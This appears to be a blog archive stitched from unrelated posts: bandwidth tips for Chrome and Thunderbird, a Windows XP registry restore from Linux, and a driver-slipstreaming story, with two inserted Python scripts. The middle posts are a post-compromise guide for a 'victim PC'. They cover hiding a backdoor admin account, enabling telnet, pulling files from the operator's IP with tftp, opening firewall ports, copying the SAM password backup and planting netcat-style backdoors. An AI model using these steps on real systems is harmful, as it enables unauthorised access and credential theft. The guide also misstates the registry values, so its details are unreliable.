For the last 3 months I have been on a shitty internet connection which has a download limit of just 15 GB and costs an arm and a leg. But I'm stuck with it because the only other option in my area is just as bad. So it happened that this 15 GB download limit was getting used up within 4-5 days, and for the rest of the month the bandwidth gets throttled to a snail-like 512 Kbps. All of this data was gone while I was not using any bandwidth-intensive application. No torrents, videos or music streaming, just the usual work in the Opera and Chrome browsers and email.

This was bugging me too much because my current ISP (Failtel Fraudband) is notorious for shady business practices and ripping off customers. So, to be doubly sure, I downloaded and installed the GlassWire application to monitor my bandwidth usage.

Bandwidth usage report

As is clear from the report above, Google Chrome is the largest bandwidth hog even though it's my secondary browser and it mostly runs in the background while I do my work in Opera. All of this bandwidth was consumed in just about 2 hours that I had it on. While looking for a solution, I found many people complaining of the same thing and found out that Google Chrome pre-fetches data from the websites you visit most often and also automatically downloads some data from other links on the websites you are on.

Make webpages load faster

You can make webpages load faster by telling Google Chrome to prerender (preload) links. Google Chrome does this by predicting what links you might click, preparing them to load instantly for you.

For example:

  • When you’re browsing a blog, you might click “next post” when you’re done reading. The blog can tell Google Chrome to pre-load the “next post,” so the page shows instantly when you click it.
  • When you’re typing a web address in the address bar, Chrome will begin to prerender that page if it’s confident about which site you’re likely to visit (based on your local history). This will make the page show up faster when you hit enter.
    Google’s Instant Pages search feature in Chrome is powered by Chrome’s prerendering technology.

From https://support.google.com/chrome/answer/1385029?hl=en


While this is a good option for connections with unlimited bandwidth, it is just a nuisance for others. It means that Chrome is pre-fetching data from websites which, in a number of instances, is just a waste of bandwidth. This option can be found by following the steps explained in the link mentioned above:

  1. In the top-right corner of the browser window, click the Chrome menu icon.

  2. Select Settings.

  3. At the bottom of the page, click Show advanced settings.

  4. In the “Privacy” section, check “Prefetch resources to load pages more quickly.” If you want to undo this permission, simply uncheck the box.

As I wanted to save bandwidth, I unchecked the box.  After disabling this option, I kept Chrome running for half an hour and the bandwidth usage was minimal.

While looking through the detailed logs, I also found out that Mozilla Thunderbird, which I use as my primary email client, was also a big bandwidth hog, downloading 176 MB in a single day. While I use it almost all day long, that much data for text emails is way too much. By default, Thunderbird checks for messages every 10 minutes. I increased that interval to 30 minutes in Account Settings, as visible in the screenshot below.

Increase duration of checking messages in Thunderbird

Apart from that, a major bandwidth hog is the countless number of people sending messages with huge attachments and useless images, plus the many scammers and spammers with their malicious attachments. In the same menu, you can find the option Synchronization & Storage.

Size limit for downloads in Thunderbird

Here you can tell Thunderbird not to download any message bigger than your specified limit. I put in 1000 KB, but you can use any value you want. Additionally, the option just above, "Synchronize the most recent", can also be given a lower value to decrease the amount of data spent on mostly unneeded traffic.

This was done on Windows 7. I don't know if the settings are the same on Linux, but there is no reason anything should be different.


Part 1

In this post, I'll cover more things that you can do to maintain access to a remote Windows XP computer. The previous post is here.


1. Creating an Invisible Account

You can create a user "admin" by running the following command

c:\windows\system32\net user admin admin /add

But this user will be visible on the XP logon screen. To hide it, you'll have to edit some registry settings.
Open up Registry Editor and navigate to this key

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList

Here, modify or create a DWORD value by right-clicking on the right-hand side of the window and adding a DWORD Value. The name of the value must be the same as the account name (admin here) that you want to hide. Set the value data to 0 to hide it and 0 to unhide.
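A defender-side check for the registry trick described above, added here as an example and not part of the post: it parses a regedit export of the UserList key and lists every account hidden from the logon screen, then separates out the ones that are not in the (assumed) XP built-in baseline. The account names in the constructed sample export and the baseline set are assumptions for the demonstration.

```python
import re

# Key the post describes; regedit writes it exactly like this in the [...] header line.
USERLIST_KEY = (r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion"
                r"\Winlogon\SpecialAccounts\UserList")

# Accounts XP hides here out of the box (assumed baseline; compare against a
# known-good machine of the same build rather than trusting this set blindly).
BASELINE_HIDDEN = {"HelpAssistant", "SUPPORT_388945a0"}

def hidden_accounts(reg_export: str) -> list[str]:
    """Return names whose UserList DWORD is 0, i.e. hidden from the logon screen."""
    hidden, in_key = [], False
    for raw in reg_export.splitlines():
        line = raw.strip()
        if line.startswith("["):                      # a new key header
            in_key = line.strip("[]").lower() == USERLIST_KEY.lower()
            continue
        if not in_key:
            continue
        m = re.match(r'^"([^"]+)"=dword:([0-9a-fA-F]{8})$', line)
        if m and int(m.group(2), 16) == 0:
            hidden.append(m.group(1))
    return hidden

def unexpected_hidden(reg_export: str) -> list[str]:
    """Hidden accounts outside the assumed baseline: these deserve a closer look."""
    return [a for a in hidden_accounts(reg_export) if a not in BASELINE_HIDDEN]

def load_export(path: str) -> str:
    """reg.exe writes exports as UTF-16 LE with a BOM; decode them accordingly."""
    with open(path, encoding="utf-16") as fh:
        return fh.read()

# Constructed sample of what `reg export "HKLM\...\UserList" userlist.reg` produces;
# "admin" and "svc_backup" are made-up names for this demo.
SAMPLE_EXPORT = """Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts]
"unrelated"=dword:00000000

[HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\UserList]
"HelpAssistant"=dword:00000000
"SUPPORT_388945a0"=dword:00000000
"admin"=dword:00000000
"svc_backup"=dword:00000001
"""

if __name__ == "__main__":
    print("hidden:", hidden_accounts(SAMPLE_EXPORT))
    print("unexpected:", unexpected_hidden(SAMPLE_EXPORT))
```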

2. Enabling Telnet

Telnet is one simple utility that you can use to maintain access without uploading any extra backdoor/software. The Telnet server is disabled on most PCs by default. You'll have to manually enable the service and set it to start automatically:

sc config telnet start= auto
net start telnet

That's it. Any service can be enabled using this command; just replace telnet with the service of your choice.
Now you can use the account you created earlier to log in any time you want.

In this post I'll write about what to do once you gain administrative privileges on a Windows PC. There's a lot that you can do, depending upon your inclinations (I hope benign).
Don't ask me how to get admin rights in the first place. Figure that out yourself.
Maybe I’ll write something on that someday, but not now.

Anyhow, once you get in, open a Windows command shell.
Here are a few things you might like to do:

1. Uploading/downloading files

The first thing you might do is upload a few files of your choice. TFTP (Trivial File Transfer Protocol) is an excellent choice for this.
You need to start the tftp service/daemon on your PC first and place the files you want to upload in the program's working directory. In most Linux versions, it's /tmp.

Type the following command to upload the netsh.exe file.

C:\WINDOWS>tftp -i 192.168.1.10 GET netsh.exe netsh.exe

Here:

-i specifies binary transfer mode

GET tells the victim PC to fetch the file from the remote PC. You can use PUT to copy data onto a remote PC

192.168.1.10 is your IP

The first netsh.exe is the file you want to upload

The second netsh.exe is the filename you want to keep on the victim PC. You can change it to anything you want.

2. Editing network settings

The file netsh.exe is a Windows program for editing the network-related settings of a PC. Most XP PCs don't have it by default, so you'll have to upload it. In this case, it's used to open certain ports in Windows Firewall that could otherwise be blocked. VNC uses ports 5900 and 5800 for communications. You can edit the firewall settings to unblock these ports by using these commands:

netsh firewall set portopening tcp 5800

netsh firewall set portopening tcp 5900

netsh.exe firewall set portopening udp 5900

This is just an example. You can use this command to block or unblock any port. Keep in mind that unblocking a particular port doesn't mean the service/program that usually uses the port will start working. For example, unblocking port 23 and trying telnet will be of no use unless the telnet service is started on that PC.

3. Copying SAM

The SAM file contains the list of all the users and their corresponding passwords in Windows. Though its encryption can be hard to break depending upon password strength, it's a very juicy target. There are quite a few paid and free programs to do that. Its default location is

C:\windows\system32\config

It's not possible to copy the SAM file directly as it's a protected system file. But there is a loophole here too. A backup copy of SAM is almost always located in

C:\windows\repair

Unlike the original SAM, you can copy this file to your own PC.

4. Uploading a back-door

A back-door program, for example netcat, is necessary if you want to keep unrestricted access. netcat is supposed to be a good program, but most anti-virus programs detect it very easily, so it's slightly out of fashion. If that's the case, you can try using some script-based back-doors like Matahari. It's a Perl script. The only downside is that the target PC needs to have Perl installed, which most Windows PCs don't.
Linux fares better in this case. Another good option is VNC.

That’s enough for now. Let me know if you have any suggestions or corrections.


A few days back, my Windows XP got infected by a few viruses. Using infected pen drives seemed to be the reason. One particularly pesky virus was a script that started every time I logged on, even after I deleted the .vbs file manually. So I opened up regedit.exe and deleted every registry entry containing that file name. Bad move.
The next time I rebooted, I got the Welcome Screen, which I usually bypass. Clicking on my user name was not good enough to log in. It'd display "Loading User Settings" and then come back to the login screen without getting to the desktop. I have a dual-boot system with Linux as the other OS (using ntfs-3g it's possible to read and write NTFS partitions from Linux). I could do most work on Linux, but not gaming. I needed that XP back, and reinstalling was not an option.
So… I booted into Linux and fired up Google to look for a solution. There were many such cases, but only one solution was applicable in my case: restoring the registry.
There are many ways to restore the registry, one being the Windows Recovery Console. But that's slow as it involves booting from the XP CD and running commands to copy/rename files from the crappy command line of Windows. Why use the Windows command line when you can read and write NTFS partitions from Linux itself!! :p
Here are the steps:

First identify the partition on which XP is installed. In my system it was sda1.

Then make a new directory anywhere. Name it reg. Type
mkdir /reg

Now get into the Windows\system\config directory.
Type
cd /mnt/sda1/Windows/system/config
Notice that / is used in Linux, not \.

Copy the following 5 files into the Windows\repair directory:
software, system, security, sam and default

Now find the System Restore folder on the XP partition. It should look something like
/mnt/sda1/System Volume Information/_restore{74AB4D58-11E9-4AAD-83C4-A8687AfE0C89}

Get into the snapshots folder. There should be some folders there named RP** where ** stands for some number. Open the most recent folder and copy the following files

_REGISTRY_MACHINE_SAM
_REGISTRY_MACHINE_SECURITY
_REGISTRY_MACHINE_SOFTWARE
_REGISTRY_MACHINE_SYSTEM
_REGISTRY_USER_.DEFAULT

into the reg folder you created previously.

Rename these files by deleting the _REGISTRY_MACHINE_ part (and the _REGISTRY_USER_ part for .DEFAULT) from each one, so that the new names are SAM, SECURITY, SOFTWARE, .DEFAULT and SYSTEM.

Copy these 5 files to the Windows\System32\Config folder.

Reboot and get to the welcome screen. You'll be able to log in using at least one account.
In my case I logged in using the Administrator account (the only one visible). Then I created an account with the same name as the old one and got all my account settings and documents back.
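The copy-and-rename steps above as a script, added here as an example and not from the post. It assumes the XP partition is already mounted via ntfs-3g at xp_root, that the live hives sit in Windows\system32\config (as in the final copy step), and that each RP<n> folder holds a snapshot subfolder with the _REGISTRY_* files; demo() builds a constructed tree in a temp directory so it runs without a real partition.

```python
import shutil, tempfile
from pathlib import Path
HIVE_MAP = {"_REGISTRY_MACHINE_SAM": "SAM", "_REGISTRY_MACHINE_SECURITY": "SECURITY",
            "_REGISTRY_MACHINE_SOFTWARE": "SOFTWARE", "_REGISTRY_MACHINE_SYSTEM": "SYSTEM",
            "_REGISTRY_USER_.DEFAULT": ".DEFAULT"}  # snapshot file -> hive name in config

def latest_snapshot(xp_root):
    """Newest RP<n>/snapshot folder under System Volume Information/_restore{...}."""
    svi = xp_root / "System Volume Information"
    rps = [rp for rd in svi.glob("_restore{*}") for rp in rd.glob("RP*")
           if rp.name[2:].isdigit() and (rp / "snapshot").is_dir()]
    if not rps:
        raise FileNotFoundError("no restore point with a snapshot folder")
    return max(rps, key=lambda rp: int(rp.name[2:])) / "snapshot"

def on_disk_name(directory, name):
    """ntfs-3g lookups are case-sensitive: keep the existing spelling so we overwrite the hive."""
    return next((p.name for p in directory.iterdir() if p.name.lower() == name.lower()), name)

def restore_hives(xp_root, backup_dir):
    """Back up the current hives to backup_dir, then copy the newest snapshot's over them."""
    config = xp_root / "Windows" / "system32" / "config"
    backup_dir.mkdir(parents=True, exist_ok=True)
    snapshot = latest_snapshot(xp_root)
    restored = []
    for snap_name, hive in HIVE_MAP.items():
        target = config / on_disk_name(config, hive)
        if target.exists():
            shutil.copy2(target, backup_dir / target.name)  # keep the broken hive
        shutil.copy2(snapshot / snap_name, target)          # this is the rename step
        restored.append(target.name)
    return restored

def demo():
    """Constructed XP tree in a temp dir: two restore points, lowercase hive names."""
    root = Path(tempfile.mkdtemp())
    config = root / "Windows" / "system32" / "config"
    config.mkdir(parents=True)
    for hive in HIVE_MAP.values():
        (config / hive.lower()).write_text("broken")
    for n in (7, 12):  # RP12 is the more recent point and must win
        snap = root / "System Volume Information" / "_restore{GUID-PLACEHOLDER}" / f"RP{n}" / "snapshot"
        snap.mkdir(parents=True)
        for snap_name in HIVE_MAP:
            (snap / snap_name).write_text(f"rp{n}")
    restored = restore_hives(root, root / "Windows" / "repair")
    return {"restored": sorted(restored), "system": (config / "system").read_text(),
            "files": sorted(p.name for p in config.iterdir()),
            "backup": (root / "Windows" / "repair" / "sam").read_text()}
```

Because ntfs-3g looks names up case-sensitively, copying SYSTEM next to an existing system would leave two files and an ambiguous lookup, which is why the script reuses the spelling already on disk.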

If you don't have Linux, you can follow the instructions from this website.



There was something interesting to do in the office this week. They needed to install Windows Server 2003 on a Sun Fire X4100 server so that it could be used for running an anti-virus solution. It had RedHat installed previously, but they didn't have a license for the Linux version of Symantec anti-virus.
One'd think, how difficult could it be… installing Windows: point, click, voila. It actually is like that in most cases, but not in this one. Earlier it was Linux which needed loads of tweaking, specialised drivers, dependencies and what not. But now the positions have changed. Linux supports most hardware out of the box, unlike Windows.
This became clear when we started the installation. It turned out that Windows didn't have drivers for the SCSI hard disk of the X4100. We needed to provide drivers during the installation from an external source… a floppy, of all things. Considering that the server had no support for a floppy drive, it could only be a USB floppy drive, but owing to certain "politics" that was not an option. Then I tried Sun Integrated Lights Out Manager.
Logged in using the console, used every command possible, changed the IP address, but that didn't work out either. This guide here shows some of the steps used.
Then I advised slipstreaming the drivers into the Server 2003 CD. I was told that they had already done that. I asked about the procedure and promptly banged my head on the table. Their idea of slipstreaming was just copying the driver files onto the CD and hoping that the installer picks up the drivers all by itself. No modifying of other files to provide the path of the drivers or anything like that.
After I finished damaging the table with my head, I downloaded another PDF from the Sun website and made them read the correct procedure. It's quite long for them, so there is a piece of software called nLite that can do all the dirty work in 4-5 point-and-click steps.
No fun at all :|
All that one needs to do is copy the Windows CD to the hard disk. Give nLite the path of the CD dump and the drivers, choose the options to make it bootable, unattended installation and what not… and click finish. It'll make an ISO that you burn to a CD. That CD will work perfectly.
Mission accomplished.
I had the same problem with my older motherboard that didn't support SATA disks. The same procedure worked in that case too.